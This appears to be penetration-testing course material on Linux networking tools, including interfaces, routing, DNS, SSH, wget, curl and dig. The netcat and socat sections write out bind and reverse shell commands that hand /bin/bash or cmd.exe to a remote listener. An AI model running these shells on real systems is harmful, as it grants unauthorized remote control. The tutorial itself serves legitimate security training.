Linux Networking & Services
Essential Networking Utilities & Enumeration
$ ifconfig
$ ip addr
Now, let’s take a look at the chunks of information from the two command examples above. An important interface to recognize and get started with is the lo interface. lo stands for loopback, a software interface used to test the local host’s network functionality.
The default IP address assigned to this interface is 127.0.0.1, also known as localhost. This means that the IP address of 127.0.0.1 is the same as localhost. This address is not routable on the internet and pertains only to the host itself, not to the network. Any route constructed for this interface will route back to the same machine, which makes it useful for hosting internal resources on that machine.
The next interface shown in the above output is eth0, short for ethernet interface. This is the cabled connection. Linux systems utilize a device-and-number schema: in this case, this is the first ethernet interface, and the numbering starts at 0. This means that if another ethernet interface were added, it would display as eth1. The same concept applies to wireless interfaces, such as wlan; the first wireless interface would be displayed as wlan0. When you run the commands on your host, the interfaces shown may differ. The interface naming scheme covered in this module is not the only one available on Linux; depending on the Linux flavor, the default naming of the interfaces may vary.
The IP address of the host is defined next to the word inet in both utilities; ip addr also shows the netmask in CIDR notation. The MAC address is shown next to the word ‘ether.’ The MAC address is the physical hardware address of the NIC in the host. It is burned into the chip, so it cannot be changed. This value is 6 bytes in length. In Linux, it is displayed with colon (:) delimiters separating each byte value, and each byte value is represented in hexadecimal. If you don’t know what this means, that’s ok. We’ll cover hex in the ‘Cryptography’ portion of this course. For now, just know that the MAC address is a physical address that cannot be changed - unlike an IP address - and that its value is 6 bytes in length.
To configure the network interfaces, the GUI can be leveraged or the /etc/network/interfaces file can be modified. In various situations, it may be important to change the IP address of your host: the network you are connecting to may not have a DHCP server, the network may be a local network that is hard-coded for configuration purposes, you may need to ensure that your IP remains the same, or you may need to switch between networks if they coexist within the same physical space.
Working with the GUI isn’t always an option. Often, using the Linux terminal is a quicker and more practical way to make configuration changes to a Linux system, and most Linux systems don’t use a GUI at all. Let’s take a look at how to configure a network interface through the command line.
In the Linux Terminal, let’s take a look at the /etc/network/interfaces file.
This is the original content of the /etc/network/interfaces file. Notice that there isn’t a reference to eth0; that interface is managed by NetworkManager by default, so writing to the /etc/network/interfaces file will override the default management and use the configuration settings specified. We can modify this file to configure a network interface by adding the following lines to the file.
$ cat /etc/network/interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
source /etc/network/interfaces.d/*
# The loopback network interface
auto lo
iface lo inet loopback
allow-hotplug eth0
iface eth0 inet static
    address 10.1.1.254
    netmask 255.255.255.0
    gateway 10.1.1.1
If we run ‘ip addr’ again, we will still have the same IP address as before our change. In the case of my host, the IP will remain as 10.0.2.15. To have the configuration changes we made take effect, we will need to take down the interface and bring it back up.
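The commands for this might look like the following sketch, assuming the interface is named eth0 and the ifupdown tools are installed:

$ sudo ifdown eth0
$ sudo ifup eth0
$ ip addr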
Active Connections and Neighbors (netstat -natup, ss, arp -en)
Now, there are many connections made from our host, and there are a few important TCP states that we’ll need to cover. In the example above, ESTABLISHED indicates that this is an active connection. CLOSE_WAIT means that the remote end has shut down and the host is waiting for the socket to close. TIME_WAIT is when the socket is waiting after closing to handle packets still in the network. LISTEN is when the host is listening for incoming connections. SYN_SENT means the socket is actively attempting to establish a connection. This may indicate a firewall issue, as there is an attempt to establish communication, but nothing was received in response to that initial SYN request.
ss is the replacement for netstat and is the default on most newer Linux distributions. This may result in netstat not being available. The options we used for netstat are the same for ss, and the output also looks very similar.
Identifying connections coming in or going out to other networks is very useful. This can lead to understanding interconnecting services (services or programs that work together), utilizing pivot points (hosts in a network that can be used to gain access to other parts of the network), discovering internal services (such as local web servers), and even identifying any ports that are listening on a host. This information can also be used to get an idea of any firewall rules (rules that allow and/or disallow network traffic). Remote connections - or even connections to network ports - are not the only valuable pieces of network information.
Learning about arp (address resolution protocol) is the beginning of understanding how Layer 2 attacks work. arp shows the connected machines on a network at the layer 2 level of the OSI model.
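For example, the neighbor table can be listed with arp -en; an illustrative listing matching the description below (the MAC addresses shown are placeholders):

$ arp -en
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   aa:bb:cc:dd:ee:ff   C                     eth0
192.168.1.67             ether   11:22:33:44:55:66   C                     eth0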
The above output shows the default gateway (router) at 192.168.1.1 and one other device at 192.168.1.67 that is on the local network.
Routing and Network Troubleshooting (route, traceroute, ping)
Understanding where network traffic is going is very important in determining what can and cannot be accessed. As we covered in the Networking Topic, routes are determined by routers on the network. Although it is the job of the routers to ultimately direct the network traffic to the destination, a host must be configured to use that router as a gateway to the end network. We’ll get a listing of routes by entering the ‘route’ command.
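An illustrative listing, built from the values discussed below (your routing table will differ):

$ route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         10.0.2.2        0.0.0.0         UG    100    0        0 eth0
10.0.2.0        0.0.0.0         255.255.255.0   U     100    0        0 eth0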
According to the output, a default route exists that will go to the router at 10.0.2.2. The default route could also be represented as 0.0.0.0. Much like the netstat and ss utilities, the -n option can be added to keep the network values from being translated from numerical format to symbolic host names. The Destination field shows where the packets are going. In the case of the default route, any traffic that falls outside of the other defined routes will go to that router. The destination is displayed as a network IP. The Genmask field corresponds with the Destination field to define which hosts are in that network. In this case, any traffic going to the 10.0.2.0/24 network (a Genmask of 255.255.255.0, or /24 in CIDR notation) will go out the eth0 interface (Iface field). The Flags field shows that the connections are up (U) and one of them is a gateway (G). Keep in mind that routes don’t necessarily need to correspond with the addressing of our host. The route command shows the routing table that is used to tell the host where to direct traffic based on the IP.
To add a route through a gateway: sudo ip route add 10.13.37.0/24 via 10.0.2.2 (the IP after via needs to point to the gateway). A route can also be bound directly to an interface: sudo ip route add 10.13.37.0/24 dev eth1.
Another useful utility in troubleshooting network connections is traceroute. Like ping, traceroute relies on ICMP responses. Rather than sending a single probe, it sends probes with incrementally increasing TTL (time to live) values, so each hop (router) along the path reports back to the originating host. This is ideal when determining how many router hops are between a host and the target, and it can also be used to determine where a point of failure may be on a network. Each hop is a router directing the traffic to the next point in the path toward our end goal. In this case, the goal is to reach the server that holds offensive-security.com. With that, let’s run a traceroute on offensive-security.com.
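The command itself is straightforward:

$ traceroute offensive-security.com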
Name Resolution
Name resolution is the translation of human-readable names into IP addresses. It is much easier to remember something like kali.org than to remember 35.185.44.232. Sometimes, this name resolution functionality on a network will be broken and force us to use the IP instead of the name. This section will cover some critical components in the Linux system to configure name resolution on the host (whether that is to reach out to a server or to be handled locally on the machine).
The name translation mechanism is handled by what is called a DNS (Domain Name System) server. This is a server that takes the human-readable name, searches a table for that name, and then points requests for that name to the related IP address, similar to how we look up a name in a phone book to find a phone number. With respect to Linux networking, we will identify the files responsible for pointing to a DNS server and the local files responsible for name resolution. To begin, let’s look at the /etc/resolv.conf file. The following example was taken from a default installation of Kali. The provided Kali host may appear different.
If a lookup is done for a name that does not specify the domain, the domain entry will be used. In this case, let’s suppose that a browser is open and the user enters https://www. Since the domain was not specified in this browser search, the domain entry of offensive-security.com will be appended to the search, separated by a period. This will translate to https://www.offensive-security.com/. Keep in mind that the domain entry in the example given is actually a root domain, so the translation happens in full and the site is opened.
If the domain entry is not in the configuration, the search entry will be used. There can only be one value for the domain entry, whereas the search line can have a list of domains to auto-resolve.
As was resolved by the domain entry, the same would be true in the case of the search entry line. The domain entry will take priority, so having both of these lines is redundant. If there was a need to auto-resolve to multiple domains, the search entry line should be used and the domain entry line removed. An example of this could be as follows.
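For example, a configuration that relies only on the search entry might look like this (the kali.org entry is included here to match the lookup described next):

$ cat /etc/resolv.conf
search offensive-security.com kali.org
nameserver 192.168.1.1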
In the event the search entry line is configured as shown above, the search of tools will first check to see if there is a tools subdomain at offensive-security.com. If it is not found there, it will try the next entry and search for tools.kali.org.
I’ll return the /etc/resolv.conf file back to the default configuration before continuing forward.
$ cat /etc/resolv.conf
domain offensive-security.com
search offensive-security.com
nameserver 192.168.1.1
nameserver 8.8.8.8
If the first DNS server fails to resolve a name to an IP, the second nameserver set can attempt to resolve it. Adding more nameserver entries may be useful for resolving internal resources as well. When the need for name resolution doesn’t require a full DNS server, the /etc/hosts file can be configured to handle name resolution.
The first column is the IP address, and the second column is the name that will resolve to the IP. Notice that localhost is provided in two locations: the IPv4 section as 127.0.0.1 and the IPv6 section as ::1. More name entries can be provided in the same line as the IP address. An example of adding ‘me’ to the 127.0.0.1 IP is as follows.
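The modified line would look like this:

127.0.0.1       localhost me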
After this change, if we run ping -c 2 me, it resolves to 127.0.0.1.
Let’s discuss how that happens. The order of name resolution is handled by the /etc/nsswitch.conf (Name Service Switch) file. Let’s take a look at this file.
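The relevant line typically looks like the following on a default Kali install (the [NOTFOUND=return] action is the usual default, though your file may differ):

$ grep hosts: /etc/nsswitch.conf
hosts:          files mdns4_minimal [NOTFOUND=return] dns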
The first column is the service, and the second column is the way the service is handled. In the case of the hosts service, it is handled first by local files, then mdns4_minimal, and lastly dns. The mdns4_minimal entry is a multicast DNS resolver that handles entries with a .local TLD. If the lookup does not end with .local, resolution moves on to the normal dns search. Based on this, the hosts service will first reference the /etc/hosts file that was covered previously.
Now, name resolution on a local host should be within your grasp to configure and troubleshoot. This can help when a site auto-resolves to a name when a different name - or even an IP - was used initially, and it can make working with commonly used servers much easier. You should also be able to resolve DNS pointer issues when a localhost cannot resolve a name.
Common Clients (SSH, SCP, SSHPASS)
SSH (Secure Shell Protocol) is a client/server protocol that allows for secure communications between two hosts. This communication is encrypted over the network, unlike telnet (a similar client utility). SSH is commonly used to gain remote access to another host to either use or administer it. SSH works on TCP port 22 by default. It is a protocol that requires a form of authentication, whether that is a standard username/password or a public/private key pair. Let’s begin looking at the general usage of ssh. In order for you to be able to follow along, let’s start a local ssh server on the Kali host. Your output will look slightly different than what is shown below.
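On a Kali host, the server can be started with systemctl:

$ sudo systemctl start ssh
$ sudo systemctl status ssh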
Often, there will be an SSH server hosted on a port other than the default. To find out how to change this, let’s take a look at the /etc/ssh/sshd_config configuration file. Note that this is not the /etc/ssh/ssh_config file. The /etc/ssh/sshd_config file is for the ssh daemon process (the server process), whereas the /etc/ssh/ssh_config configuration file is for the ssh client.
As shown in the output, the Port line is commented out by default. Let’s uncomment this line, and change the port value to 2222.
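In /etc/ssh/sshd_config, the edit looks like this:

# before the change
#Port 22
# after the change
Port 2222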
Despite the change to the Port line, the ssh server is still available on port 22. Based on the configuration, this is not how the service should work. The issue here is that the ssh service daemon was not restarted. Let’s restart the ssh service now.
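On a systemd-based Kali host, that restart would be:

$ sudo systemctl restart ssh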
Now that the service is restarted, let’s try to access the ssh server on the default port again.
This is expected behavior of the ssh server. The server should be hosted on port 2222, so let’s add the -p option to specify the port we want to connect to.
ssh kali@localhost -p 2222
An important directory for ssh is the .ssh
directory that gets created in a user’s home directory.
The first time an ssh connection is made to a host, the client (our host) will ask if we are sure we want to make the connection. When either yes or the host’s fingerprint is entered, our host will store the information to remember it next time.
Let’s go into this directory and see what’s in it.
As we found, there is a file called known_hosts inside the ~/.ssh directory. This is the file our Kali host was adding to when it prompted us to confirm the connection. Right now, the values in this file are hashed, so we cannot understand them without decoding the output. This behavior is controlled by the HashKnownHosts option in the client configuration file, /etc/ssh/ssh_config. Let’s look at the value that controls this.
Let’s change this value to no, clear the stored file, and try the connection again. When we then read the known_hosts file, we can understand more about what connection each line refers to.
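A sketch of those steps (after editing HashKnownHosts to no in /etc/ssh/ssh_config):

$ rm ~/.ssh/known_hosts
$ ssh kali@localhost -p 2222
$ cat ~/.ssh/known_hosts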
The benefit of hashing the known_hosts file is in the event of a host compromise, an attacker would have a harder time gaining more information about remote systems that are being accessed from the host.
In the listing above, the first object highlighted is the connection destination and port. Since this was reached using the human-readable name (canonical name), it also translates that name to the IP address and port. The next highlighted portion of the listing shows the hashing algorithm that was used to fingerprint this host. In the case of the example, it is using the Elliptic Curve Digital Signature Algorithm with SHA-256. The last portion is the hash of the remote host in the connection. All of these objects put together make the fingerprint of the remote host.
This helps prevent eavesdropping or a rogue device by accounting for these pieces of information along with the hash value. Sometimes an internal network can have a change in a host’s IP that will affect the fingerprint of the known host. This can also happen in a lab environment.
The way to get around the error that an attack may be happening is to do one of two things: 1. remove the known_hosts file or the entry for that server in the file, or 2. add the -o StrictHostKeyChecking=no option to the ssh command. Remember that this file is a security mechanism to prevent an unauthorized host from eavesdropping on network traffic. In real-world practice, this mechanism should not be bypassed.
Instead of changing a global configuration file that affects all users on a system, we’ll look at a file that may be more relevant to a separate user account. This file is ~/.ssh/config. It is read before the /etc/ssh/ssh_config file. It is a user-defined file to handle the client configuration for a host, all hosts, or even to exclude hosts. Since this is a user-defined file, it will not exist by default. Let’s take a look at creating this file for the example given for bandit.labs.overthewire.org.
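A minimal entry might look like the following; the port and username shown are the values published by the OverTheWire bandit lab and should be adjusted to your target:

$ cat ~/.ssh/config
Host bandit
    Hostname bandit.labs.overthewire.org
    Port 2220
    User bandit0
$ chmod 600 ~/.ssh/config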
Now that an entry for bandit was made in the ~/.ssh/config file, these settings in the ssh configuration will be used when using the alias bandit. It is also important to note that this file must have 0600 (-rw-------) permissions on it. Let’s run the ssh command against the alias.
SSH can also be used to remotely copy files, through a utility called SCP (Secure Copy Protocol). For this example, we’ll shift back to the local SSH server. Let’s go into the Kali user’s home directory and start the SSH service again.
The syntax for scp is very similar to the cp command, except that the remote file location takes the form user@host:remote-file-path.
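For example, to copy a file up to the remote host and then back again (the file names are illustrative; add -P 2222 if the server still listens on the custom port):

$ scp notes.txt kali@localhost:/home/kali/notes.txt
$ scp kali@localhost:/home/kali/notes.txt .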
The last thing we’ll go over in the ssh portion of this section is sshpass. This utility is designed to supply the ssh password as part of the command execution, rather than manually entering it at the prompt. This is useful because an ssh session can be opened by a script without requiring the interaction of a user. Despite the usefulness of this utility, there are severe security drawbacks. Before we get into the negatives of using sshpass, let’s go over how it works, including how to install it.
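Installation and basic usage might look like this sketch (the password shown is a placeholder):

$ sudo apt install sshpass
$ sshpass -p 'password123' ssh kali@localhost -p 2222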
The ssh session was logged in automatically with the provided password. Now that the functionality of sshpass has been covered, let’s look at two reasons why we may choose not to use this utility in a production environment. The first is the command history. If a user on a host is compromised, the history command can show the latest commands that were executed by that user. This can be used by an attacker to identify user credentials, other remote systems that are accessible, and can even lead to full-system control by means of privilege escalation. Remember, in the Linux module of this course, the history of user commands was found by reading the ~/.zsh_history file. The history command does the same thing for the current user. Let’s take a look at the latest history of the kali user now.
In the listing above, we can find the password to the bandit host alias in plaintext. An attacker could use this information to gain access to the remote host as well. The other reason is very similar: an attacker could read the password in plaintext if this utility is used in a script. It is bad practice to store passwords in plaintext in any file on a system, so embedding them in a script via sshpass should be avoided.
Netcat (nc)
Netcat, first released in 1995(!) by Hobbit, is one of the “original” network penetration testing tools and is so versatile that it lives up to the author’s designation as a hacker’s “Swiss army knife”. The clearest definition of Netcat is from Hobbit himself: a simple “utility which reads and writes data across network connections, using TCP or UDP protocols.”
Connecting to a TCP/UDP Port
As suggested by the description, Netcat can run in either client or server mode. To begin, let’s look at the client mode.
We can use client mode to connect to any TCP/UDP port, allowing us to:
- Check if a port is open or closed.
- Read a banner from the service listening on a port.
- Connect to a network service manually.
Let’s begin by using Netcat (nc) to check if TCP port 110 (the POP3 mail service) is open on one of the lab machines. We will supply several arguments: the -n option to skip DNS name resolution; -v to add some verbosity; the destination IP address; and the destination port number:
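The full command looks like this (server output omitted here):

$ nc -nv 10.11.0.22 110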
Listing 60 tells us several things. First, the TCP connection to 10.11.0.22 on port 110 (10.11.0.22:110 in standard nomenclature), succeeded, so Netcat reports the remote port as open. Next, the server responded to our connection by “talking back to us”, printed out the server welcome message, and prompted us to log in, which is standard behavior for POP3 services.
Let’s try to interact with the server:
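The exact exchange depends on the server, but a short session using the standard POP3 USER and PASS commands might look like this sketch (the credentials are placeholders):

USER offsec
+OK
PASS lab
+OK Logged in.
quit
+OK Logging out.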
Listening on a TCP/UDP Port
Listening on a TCP/UDP port using Netcat is useful for network debugging of client applications, or otherwise receiving a TCP/UDP network connection. Let’s try implementing a simple chat service involving two machines, using Netcat both as a client and as a server.
On a Windows machine with IP address 10.11.0.22, we set up Netcat to listen for incoming connections on TCP port 4444. We will use the -n option to disable DNS name resolution, -l to create a listener, -v to add some verbosity, and -p to specify the listening port number:
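The listener command on the Windows machine (the "listening" line is typical netcat-traditional output):

C:\Users\offsec> nc -nlvp 4444
listening on [any] 4444 ...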
Now that we have bound port 4444 on this Windows machine to Netcat, let’s connect to that port from our Linux machine and enter a line of text:
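A sketch from the Kali side, with a sample line of chat text typed after the connection opens:

$ nc -nv 10.11.0.22 4444
(UNKNOWN) [10.11.0.22] 4444 (?) open
This chat is from the linux machine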
Our text will be sent to the Windows machine over TCP port 4444 and we can continue the “chat” from the Windows machine:
Transferring Files with Netcat
Netcat can also be used to transfer files, both text and binary, from one computer to another. In fact, forensics investigators often use Netcat in conjunction with dd (a disk copying utility) to create forensically sound disk images over a network.
To send a file from our Kali virtual machine to the Windows system, we initiate a setup that is similar to the previous chat example, with some slight differences. On the Windows machine, we will set up a Netcat listener on port 4444 and redirect any output into a file called incoming.exe:
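The listener with output redirection:

C:\Users\offsec> nc -nlvp 4444 > incoming.exe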
On the Kali system, we will push the wget.exe file to the Windows machine through TCP port 4444:
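A sketch of the sending side; the wget.exe path shown is where Kali typically ships its Windows binaries, but adjust it to wherever the file lives on your system:

$ nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe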
The connection is received by Netcat on the Windows machine as shown below:
Notice that we have not received any feedback from Netcat about our file upload progress. In this case, since the file we are uploading is small, we can just wait a few seconds, then check whether the file has been fully uploaded to the Windows machine by attempting to run it:
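For example, asking the binary for its help output:

C:\Users\offsec> incoming.exe -h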
We can see that this is, in fact, the wget.exe executable and that the file transfer was successful.
Remote Administration with Netcat
One of the most useful features of Netcat is its ability to do command redirection. The netcat-traditional version of Netcat (compiled with the “-DGAPING_SECURITY_HOLE” flag) enables the -e option, which executes a program after making or receiving a successful connection. This powerful feature opened up all sorts of interesting possibilities from a security perspective and is therefore not available in most modern Linux/BSD systems. However, due to the fact that Kali Linux is a penetration testing distribution, the Netcat version included in Kali supports the -e option.
When enabled, this option can redirect the input, output, and error messages of an executable to a TCP/UDP port rather than the default console.
For example, consider the cmd.exe executable. By redirecting stdin, stdout, and stderr to the network, we can bind cmd.exe to a local port. Anyone connecting to this port will be presented with a command prompt on the target computer.
To clarify this, let’s run through a few more scenarios involving Bob and Alice.
Netcat Bind Shell Scenario
In our first scenario, Bob (running Windows) has requested Alice’s assistance (who is running Linux) and has asked her to connect to his computer and issue some commands remotely. Bob has a public IP address and is directly connected to the Internet. Alice, however, is behind a NATed connection, and has an internal IP address. To complete the scenario, Bob needs to bind cmd.exe to a TCP port on his public IP address and asks Alice to connect to his particular IP address and port.
Bob will check his local IP address, then run Netcat with the -e option to execute cmd.exe once a connection is made to the listening port:
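A sketch of Bob's side, checking the IP and then binding the shell:

C:\Users\bob> ipconfig
C:\Users\bob> nc -nlvp 4444 -e cmd.exe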
Now Netcat has bound TCP port 4444 to cmd.exe and will redirect any input, output, or error messages from cmd.exe to the network. In other words, anyone connecting to TCP port 4444 on Bob’s machine (hopefully Alice) will be presented with Bob’s command prompt. This is indeed a “gaping security hole”!
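Alice would then connect with a plain Netcat client (reusing the 10.11.0.22 address from the earlier examples for Bob's machine):

$ nc -nv 10.11.0.22 4444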
Reverse Shell Scenario
In our second scenario, Alice needs help from Bob. However, Alice has no control over the router in her office, and therefore cannot forward traffic from the router to her internal machine.
In this scenario, we can leverage another useful feature of Netcat; the ability to send a command shell to a host listening on a specific port. In this situation, although Alice cannot bind a port to /bin/bash locally on her computer and expect Bob to connect, she can send control of her command prompt to Bob’s machine instead. This is known as a reverse shell. To get this working, Bob will first set up Netcat to listen for an incoming shell. We will use port 4444 in our example:
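Bob's listener:

C:\Users\bob> nc -nlvp 4444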
Now, Alice can send a reverse shell from her Linux machine to Bob. Once again, we use the -e option to make an application available remotely, which in this case happens to be /bin/bash, the Linux shell:
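Alice's command, again assuming Bob is at 10.11.0.22:

$ nc -nv 10.11.0.22 4444 -e /bin/bash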
Once the connection is established, Alice’s Netcat will have redirected /bin/bash input, output, and error data streams to Bob’s machine on port 4444, and Bob can interact with that shell:
Socat
Socat is a command-line utility that establishes two bidirectional byte streams and transfers data between them. For penetration testing, it is similar to Netcat but has additional useful features.
While there are a multitude of things that socat can do, we will only cover a few of them to illustrate its use. Let’s begin exploring socat and see how it compares to Netcat.
Netcat vs Socat
First, let’s connect to a remote server on port 80 using both Netcat and socat:
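Side by side, reusing the 10.11.0.22 lab address from the earlier examples as the remote server:

$ nc 10.11.0.22 80
$ socat - TCP4:10.11.0.22:80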
Note that the syntax is similar, but socat requires the - to transfer data between STDIO and the remote host (allowing our keyboard interaction with the shell) and protocol (TCP4). The protocol, options, and port number are colon-delimited.
Because root privileges are required to bind a listener to ports below 1024, we need to use sudo when starting a listener on port 443:
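For comparison, both listeners:

$ sudo nc -nlvp 443
$ sudo socat TCP4-LISTEN:443 STDOUT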
Notice the required addition of both the protocol for the listener (TCP4-LISTEN) and the STDOUT argument, which redirects standard output.
Socat File Transfers
Next, we will try out file transfers. Continuing with the previous fictional characters of Alice and Bob, assume Alice needs to send Bob a file called secret_passwords.txt. As a reminder, Alice’s host machine is running on Linux, and Bob’s is running Windows. Let’s see this in action.
On Alice’s side, we will share the file on port 443. In this example, the TCP4-LISTEN option specifies an IPv4 listener, fork creates a child process once a connection is made to the listener, which allows multiple connections, and file: specifies the name of a file to be transferred:
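Alice's command:

$ sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt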
On Bob’s side, we will connect to Alice’s computer and retrieve the file. In this example, the TCP4 option specifies IPv4, followed by Alice’s IP address (10.11.0.4) and listening port number (443), file: specifies the local file name to save the file to on Bob’s computer, and create specifies that a new file will be created:
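The receiving command (the local file name is illustrative):

C:\Users\bob> socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create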
Socat Reverse Shells
Let’s take a look at a reverse shell using socat. First, Bob will start a listener on port 443. To do this, he will supply the -d -d option to increase verbosity (showing fatal, error, warning, and notice messages), TCP4-LISTEN:443 to create an IPv4 listener on port 443, and STDOUT to connect standard output (STDOUT) to the TCP socket:
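Bob's listener:

C:\Users\bob> socat -d -d TCP4-LISTEN:443 STDOUT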
Next, Alice will use socat’s EXEC option (similar to the Netcat -e option), which will execute the given program once a remote connection is established. In this case, Alice will send a /bin/bash reverse shell (with EXEC:/bin/bash) to Bob’s listening socket on 10.11.0.22:443:
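Alice's command:

$ socat TCP4:10.11.0.22:443 EXEC:/bin/bash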
Once connected, Bob can enter commands from his socat session, which will execute on Alice’s machine.
HTTP (wget, curl)
wget is a very useful utility to download files from a web server. wget is derived from World Wide Web and ‘get.’ Typing ‘wget’ in the Linux terminal will display the usage for the utility.
To get an idea of how to use wget, let’s download the syllabus for the course after this (PEN-200). The PDF is located at https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf. In the Linux Terminal, we’ll enter the following.
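The command is:

$ wget https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf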
Next, we will cover how to rename the downloaded file. This can be done with the ‘-O’ option. This is a capital ‘o.’ The lowercase ‘-o’ option will instead log the messages displayed on the terminal to the file specified. The two options are demonstrated below.
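A sketch of both options (the output file names are illustrative):

$ wget -O syllabus.pdf https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf
$ wget -o download.log https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf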
The last thing we’ll cover with wget is the ‘--recursive’ option. This is great when the goal is to rebuild a website or copy an entire website onto your host. Be careful when doing this, as some websites contain a lot of data and will fill up your hard drive when pulling it all in. In the following example, I execute wget with the ‘--recursive’ option on https://www.kali.org/. I stopped the website copy by pressing Ctrl+C.
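The command itself looks like this:

$ wget --recursive https://www.kali.org/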
When this process is completed, the website can be searched within the current directory. Let’s list the downloaded content in the terminal.
wget neatly organizes the downloaded content in the same structure as the website. This may be a useful activity for a security professional to search an entire website for things like cleartext credentials, databases, uncontrolled directories, etc.
Another client we can use to copy files from servers is cURL. The name stands for “Client URL.” curl is extremely powerful in that it includes an incredible number of options that can be added to manipulate the request to the server. We’ll cover the following options: --silent (don’t show the progress meter or error messages), -o (output file), -k (suppress certificate errors), and -x (use a proxy). Before we begin with the options, let’s take a look at the most basic usage. The previous files that were downloaded with wget were removed before these exercises.
In the output above, the most basic execution of curl did not work. This is because we were attempting to download a PDF file, which doesn’t render the same as a webpage or plaintext content. Let’s follow the advice from the error message and add the output option (-o) with a name for the file.
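The resulting commands (the output file name is illustrative), with the file command verifying the download afterwards:

$ curl -o penetration-testing-with-kali.pdf https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf
$ file penetration-testing-with-kali.pdf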
We followed the advice of the output error and added an output option (-o) to give the downloaded file a name. This file was then downloaded and can be verified as a PDF, using the ‘file’ command. Let’s take another look at the basic usage of curl, but this time on a webpage and not a file.
Let’s now look at another site example that will give an error message with the same syntax of curl.
Strangely, the same error appears again. Let’s take a look at why this may be happening by looking at the HTTP Headers with the ‘-I’ option.
The reason the error still reports the page as a binary is the content-encoding header from the web server. Note that the encoding is ‘gzip.’ This means that the page is delivered to the browser as compressed (gzip) content, which also registers as binary. When presented with these types of errors, referring to the manpage or searching for the error message can be incredibly useful. For now, we’ll just tell you that the option to use to overcome the error is ‘--compressed.’ Web headers and the way websites work will be further covered in the “Web” section of this course. Let’s execute the curl command again with the appropriate option for this site.
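With the site from the example represented by a placeholder, the two commands are:

$ curl -I https://www.example-site.com/
$ curl --compressed https://www.example-site.com/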
In line with the subject of erroneous output, in many lab settings, web certificate errors come up. To suppress these errors and continue, the ‘-k’ option can be used. Outside of labs, it is not recommended to use this option, unless it is known that the web server is trusted. For the next demonstration, https://self-signed.badssl.com/ will be used to exhibit the error and overcoming the error with this option.
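A sketch of the failing and working requests (the exact error wording varies by curl version):

$ curl https://self-signed.badssl.com/
curl: (60) SSL certificate problem: self signed certificate
$ curl -k https://self-signed.badssl.com/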
When we add the ‘-k’ option, the SSL error will be ignored and the page can be retrieved.
Curl can also leverage a proxy before pulling the content from a web page by adding the ‘-x’ option. The syntax for this is as follows.
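$ curl -x [protocol://]proxy-host[:port] <url>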
The system in this demonstration is taken from VulnHub, and is called “SickOS: 1.1”. The goal in this demonstration is not to cover the exploitation of this vulnerable machine or the tools that are involved, but to exhibit the use of a proxy on the system to read web content with curl. SickOs: 1.1 has the IP address of 192.168.56.4 on my system.
Again, don’t worry about the details of this nmap scan. What is important for us, from this output, is port 3128, where an HTTP proxy (Squid) is listed. Let’s try to connect to the standard port 80 with curl. Note that port 80 isn’t shown in the nmap output above. This is purely a demonstration of what the proxy does when used.
Now, let’s try to leverage the internal proxy on the system and curl the same webpage.
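The command would look like this:

$ curl -x http://192.168.56.4:3128 http://192.168.56.4/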
The page now resolves, and we can clearly see that the OS is sick.
DNS (host, dig, nslookup)
The Domain Name System (DNS) is one of the most critical systems on the Internet and is a distributed database responsible for translating user-friendly domain names into IP addresses.
This is facilitated by a hierarchical structure that is divided into several zones, starting with the top-level root zone. Let’s take a closer look at the process and servers involved in resolving a hostname like www.megacorpone.com.
The process starts when a hostname is entered into a browser or other application. The browser passes the hostname to the operating system’s DNS client and the operating system then forwards the request to the external DNS server it is configured to use. This first server in the chain is known as the DNS recursor and is responsible for interacting with the DNS infrastructure and returning the results to the DNS client. The DNS recursor contacts one of the servers in the DNS root zone. The root server then responds with the address of the server responsible for the zone containing the Top Level Domain (TLD), in this case, the .com TLD.
Once the DNS recursor receives the address of the TLD DNS server, it queries it for the address of the authoritative nameserver for the megacorpone.com domain. The authoritative nameserver is the final step in the DNS lookup process and contains the DNS records in a local database known as the zone file. It typically hosts two zones for each domain, the forward lookup zone that is used to find the IP address of a specific hostname and the reverse lookup zone (if configured by the administrator), which is used to find the hostname of a specific IP address. Once the DNS recursor provides the DNS client with the IP address for www.megacorpone.com, the browser can contact the correct web server at its IP address and load the webpage.
To improve the performance and reliability of DNS, DNS caching is used to store local copies of DNS records at various stages of the lookup process. That is why some modern applications, such as web browsers, keep a separate DNS cache. In addition, the local DNS client of the operating system also maintains its own DNS cache along with each of the DNS servers in the lookup process. Domain owners can also control how long a server or client caches a DNS record via the Time To Live (TTL) field of a DNS record.
Interacting with a DNS Server
Each domain can use different types of DNS records. Some of the most common types of DNS records include:
- NS - Nameserver records contain the name of the authoritative servers hosting the DNS records for a domain.
- A - Also known as a host record, the A record contains the IP address of a hostname (such as www.megacorpone.com).
- MX - Mail Exchange records contain the names of the servers responsible for handling email for the domain. A domain can contain multiple MX records.
- PTR - Pointer Records are used in reverse lookup zones and are used to find the records associated with an IP address.
- CNAME - Canonical Name Records are used to create aliases for other host records.
- TXT - Text records can contain any arbitrary data and can be used for various purposes, such as domain ownership verification.
Due to the wealth of information contained within DNS, it is often a lucrative target for active information gathering.
To demonstrate this, we’ll use the host command to find the IP address of www.megacorpone.com:
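$ host www.megacorpone.com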
By default, the host command looks for an A record, but we can also query other fields, such as MX or TXT records. To do this, we can use the -t option to specify the type of record we are looking for:
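For example, querying the MX and TXT records:

$ host -t mx megacorpone.com
$ host -t txt megacorpone.com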
Beyond the use of the host command, nslookup and dig can be used to identify the IP addresses of hosts by their human-readable names. nslookup and dig are very similar tools. Let’s cover the basic usage of nslookup.
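The basic invocation is:

$ nslookup kali.org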
The above output shows that kali.org has the IP address of 35.185.44.232. Again, your output may be different, if the IP changes from the time of this writing. There is more that can be done with nslookup, but let’s move on to dig. dig operates similarly to nslookup, and the basic usage is the same.
As can be observed in the output above, the host IP for kali.org is 35.185.44.232. Notice that the default search record for both nslookup and dig is the A record. This can be changed by specifying the type in the command line. In dig, this is done with the -t (type) option. Let’s look at what mailservers may be used for kali.org.
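The command:

$ dig -t MX kali.org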
dig can also specify a DNS server to make the request to. This is done by adding the @ symbol followed by the name or IP of the DNS server. The following demonstrates the request to Google’s DNS server to kali.org.
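The command:

$ dig @8.8.8.8 kali.org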
FTP (ftp -vn)
